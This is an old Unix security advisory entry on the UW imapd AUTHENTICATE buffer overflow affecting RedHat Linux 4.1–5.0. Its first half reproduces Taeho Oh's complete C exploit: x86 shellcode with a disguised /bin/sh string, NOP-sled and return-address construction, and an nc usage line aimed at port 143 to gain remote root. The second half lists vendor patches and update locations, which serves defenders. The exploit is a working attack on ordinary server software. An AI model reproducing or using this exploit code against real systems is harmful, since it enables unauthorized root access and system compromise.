COMMAND
imapd
SYSTEMS AFFECTED
RedHat Linux 4.1, 4.2, 5.0
PROBLEM
Taeho Oh posted following. He made imapd exploit for RedHat
Linux system. Check out imapd #2 in 'mUNIXes' section for more
details. Here it goes:
/*
Imapd exploit code for x86 linux
Remote user can gain root access.
Tested redhat linux : 4.1 , 4.2 and 5.0.
Tested imapd version : 9.0, 10.166, 10.190, 10.205 and 10.223.
Usage
$ ( imapd-ex 0 ; cat ) | nc target.com 143
|
+------ try from -3000 to 3000 ( try in steps of 500 )
How to patch imapd buffer overflow bug
See http://www.cert.org/advisories/CA-98.09.imapd.html
This program is only for demonstrative use only.
USE IT AT YOUR OWN RISK!
Programmed by Taeho Oh 1998/09/23
Taeho Oh ( ohhara@postech.ac.kr ) http://ohhara.postech.ac.kr
*/
#include <stdio.h>
#include <stdlib.h>
#define OFFSET 0
#define RET_POSITION 1032
#define RANGE 20
#define NOP 0x90
char shellcode[1024]=
"\xeb\x38" /* jmp 0x38 */
"\x5e" /* popl %esi */
"\x80\x46\x01\x50" /* addb $0x50,0x1(%esi) */
"\x80\x46\x02\x50" /* addb $0x50,0x2(%esi) */
"\x80\x46\x03\x50" /* addb $0x50,0x3(%esi) */
"\x80\x46\x05\x50" /* addb $0x50,0x5(%esi) */
"\x80\x46\x06\x50" /* addb $0x50,0x6(%esi) */
"\x89\xf0" /* movl %esi,%eax */
"\x83\xc0\x08" /* addl $0x8,%eax */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %eax,0x7(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xc3\xff\xff\xff" /* call -0x3d */
"\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh" */ /* /bin/sh is disguised */
void main(int argc,char **argv)
{
char buff[RET_POSITION+RANGE+1],*ptr;
long *addr_ptr,addr;
unsigned long sp;
int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
int i;
if(argc>1)
offset=atoi(argv[1]);
sp=0xbffff29f;
addr=sp-offset;
ptr=buff;
addr_ptr=(long*)ptr;
for(i=0;i<bsize;i+=4)
*(addr_ptr++)=addr;
for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
buff[i]=NOP;
ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
for(i=0;i<strlen(shellcode);i++)
*(ptr++)=shellcode[i];
buff[bsize-1]='\0';
printf("* AUTHENTICATE {%d}\r\n",bsize);
for(i=0;i<bsize;i++)
putchar(buff[i]);
printf("\r\n");
}
SOLUTION
This will be fixed in the Pine 4.01 maintenance release, but in
the mean time, if you are using the UW IMAP server, please update
it with the following distribution:
ftp://ftp.cac.washington.edu/mail/imap.tar.Z
IMAP Server Vendors Info:
NEC Corporation
===============
The University of Washington imapd is shipped with our product
"Mobilenet/IMAP" and so it is vulnerable.
Netscape
========
Netscape Messaging Server 3.55 and before are susceptible to
this vulnerability. However, it should be noted that Netscape
Messaging Server (any version) does NOT run as root and
therefore, the exposure is much more limited than the
University of Washington example. Regardless, we have
released a patch available at:
http://help.netscape.com/products/server/messaging
which addresses this vulnerability.
Sun Microsystems
================
Sun Microsystems is working on patches for Solstice Internet
Mail Server product versions 2.0, 3.1 and 3.2.
Caldera Linux
=============
Releasing patched imap-4.1; will release imap-4.2 as soon as
it becomes available at:
ftp://ftp.caldera.com/pub/OpenLinux/updates/1.2/010
FreeBSD
=======
FreeBSD does not ship default with imap. However, there is a
version of imapd from Washington University in the FreeBSD
ports collections, known as imap-uw. If anyone is using the
imap port, we suggest fetching the latest revision of imap and
manually install it, or wait until the FreeBSD port is updated
and reinstall imap-uw using the ports system. You can check
the ports status at:
http://www.freebsd.org/ports/mail.html
IBM Corporation
===============
The version of imapd shipped with AIX 4.2 and 4.3 is
vulnerable. We are currently working on the following fixes
which will be available soon:
AIX 4.2.x: IX80446
AIX 4.3.x: IX80447
RedHat
======
Patches:
rpm -Uvh ftp://ftp.redhat.com/updates/5.0/i386/imap-4.1.final-1.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/5.0/alpha/imap-4.1.final-1.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/5.0/sparc/imap-4.1.final-1.sparc.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/4.2/i386/imap-4.1.final-0.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/4.2/alpha/imap-4.1.final-0.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/4.2/sparc/imap-4.1.final-0.sparc.rpm
The Santa Cruz Operation, Inc.
==============================
The SCO UnixWare 7 product is vulnerable. Binary versions of
University of Washington imapd will be available shortly from
the SCO ftp site:
ftp://ftp.sco.com/SSE/sse014.ltr - cover letter
ftp://ftp.sco.com/SSE/sse014.tar.Z - replacement binaries
Silicon Graphics Inc.
=====================
Silicon Graphics distributes a freeware University of
Washington imapd daemon called fw_imap which is available from
the web via
http://freeware.sgi.com/
Sun Microsystems Inc.
====================
Sun recommends that you install the patches listed below
immediately on systems using Sun Internet Mail Server(SIMS)
3.2 and 2.0. The following patches are available in relation
to the above problem:
SIMS Patch ID
_____ _________
3.2 105935-09
3.2_x86 105936-09
2.0 105346-07
2.0_x86 105347-07
Note: Sun recommends that sites using SIMS 3.1 or 3.1_x86 upgrade
to 3.2 or 3.2_x86 and apply the corresponding patches referenced
above.